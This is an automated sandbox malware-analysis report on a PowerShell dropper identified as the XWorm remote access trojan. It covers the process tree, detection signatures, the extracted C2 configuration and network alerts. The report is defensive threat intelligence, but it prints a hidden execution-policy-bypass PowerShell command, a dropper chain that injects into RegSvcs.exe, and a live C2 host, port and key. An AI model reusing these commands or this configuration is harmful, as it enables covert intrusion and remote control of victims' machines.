Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LUYYSwStKN.ps1

Overview

General Information

Sample name:LUYYSwStKN.ps1
renamed because original name is a hash value
Original sample name:046ef795e6a9e68203ad07963b6a828d5aff2f55ec57bb8c0ebd778ae594d1c4.ps1
Analysis ID:1517142
MD5:7e553f6792b09e28363c15010aab9c06
SHA1:84fb99b35b92f9bf8f1468db6be571ad4c7164bd
SHA256:046ef795e6a9e68203ad07963b6a828d5aff2f55ec57bb8c0ebd778ae594d1c4
Tags:ps1vecotr-viewdns-netuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 7432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7720 cmdline: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7776 cmdline: C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7820 cmdline: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7836 cmdline: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • RegSvcs.exe (PID: 1112 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["vecotr.viewdns.net"], "Port": "50000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x691a:$cnc4: POST / HTTP/1.1
    0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: RegSvcs.exe PID: 1112JoeSecurity_XWormYara detected XWormJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        11.2.RegSvcs.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
          11.2.RegSvcs.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6b1a:$cnc4: POST / HTTP/1.1

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Powerup Write Hijack DLL
          Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Music\Visuals\VsEnhance.bat
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , CommandLine|base64offset|contains: >^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7820, ParentProcessName: cmd.exe, ProcessCommandLine: Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" , ProcessId: 7836, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , ProcessId: 7720, ProcessName: wscript.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", ProcessId: 7432, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Music\Visuals\VsLabs.vbs
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 660, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs" , ProcessId: 7720, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1", ProcessId: 7432, ProcessName: powershell.exe
          Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7432, TargetFilename: C:\ProgramData\Music\Visuals\VsLabsData.ps1

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-24T19:25:13.791487+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:25:24.748235+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:25:32.877958+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:25:35.698559+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:25:46.648279+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:25:57.608120+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:02.903691+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:08.555372+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:12.931936+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:16.023117+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:16.340092+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:16.652649+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:17.382669+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:21.725945+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:21.820231+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:21.914188+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:25.507814+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:27.195134+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:33.059013+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:33.104163+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:33.123572+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:37.851584+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:42.946290+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:48.233757+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:48.381584+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:53.774369+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:53.873439+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:53.967825+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:58.946650+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:02.570295+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:02.896185+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:09.230985+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:09.405766+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:14.570796+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:20.536912+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:21.375677+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:26.491944+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:26.793587+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:27.384312+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:31.000920+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:31.978866+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:32.294184+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:32.508165+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:32.601913+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:32.889033+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:37.695102+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:47.914126+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:48.008792+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:48.103507+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:53.460993+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:53.555306+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:02.917743+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:04.504619+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:09.220237+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:20.190811+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:26.117597+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:26.961830+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:32.943531+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:33.102594+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:33.726433+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:40.508134+020028528701Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-24T19:25:13.918341+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:25:24.749845+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:25:35.700131+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:25:46.650252+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:25:57.610207+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:08.556783+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:12.934483+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:16.024588+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:16.341786+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:16.656862+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:17.384378+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:21.728007+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:21.821903+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:21.915468+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:25.514615+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:27.196748+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:33.063429+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:37.853316+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:42.951206+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:48.235684+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:48.387411+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:53.780934+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:53.875508+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:53.969418+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:26:58.948487+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:02.572088+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:09.273733+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:09.407178+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:14.590483+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:20.575789+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:21.377498+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:26.496662+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:26.795173+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:27.393845+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:31.002452+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:31.980563+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:32.295749+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:32.415590+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:32.509450+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:32.609303+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:37.697128+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:47.916305+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:48.010326+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:48.105240+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:53.462880+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:27:53.557408+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:04.513037+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:09.222074+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:20.193394+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:26.119013+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:26.984322+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:33.747633+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          2024-09-24T19:28:40.509105+020028529231Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-24T19:25:32.877958+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:02.903691+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:33.104163+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:26:33.123572+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:02.896185+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:27:32.889033+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:02.917743+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:32.943531+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          2024-09-24T19:28:33.102594+020028528741Malware Command and Control Activity Detected191.96.207.18050000192.168.2.849709TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-24T19:26:32.647413+020028531931Malware Command and Control Activity Detected192.168.2.849709191.96.207.18050000TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["vecotr.viewdns.net"], "Port": "50000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
          Multi AV Scanner detection for submitted file
          Source: LUYYSwStKN.ps1ReversingLabs: Detection: 18%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Sample uses string decryption to hide its real strings
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: vecotr.viewdns.net
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: 50000
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: <123456789>
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: <Xwormmm>
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: XWorm V5.6
          Source: 11.2.RegSvcs.exe.400000.0.unpackString decryptor: USB.exe
          Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49706 version: TLS 1.2

          Software Vulnerabilities

          barindex
          Suspicious execution chain found
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49709 -> 191.96.207.180:50000
          Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 191.96.207.180:50000 -> 192.168.2.8:49709
          Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.8:49709 -> 191.96.207.180:50000
          Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 191.96.207.180:50000 -> 192.168.2.8:49709
          Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49709 -> 191.96.207.180:50000
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: vecotr.viewdns.net
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficTCP traffic: 192.168.2.8:49709 -> 191.96.207.180:50000
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
          Source: Joe Sandbox ViewIP Address: 191.96.207.180 191.96.207.180
          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
          Source: Joe Sandbox ViewASN Name: ASN-XTUDIONETES ASN-XTUDIONETES
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: api.ipify.org
          Source: unknownDNS query: name: api.ipify.org
          Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
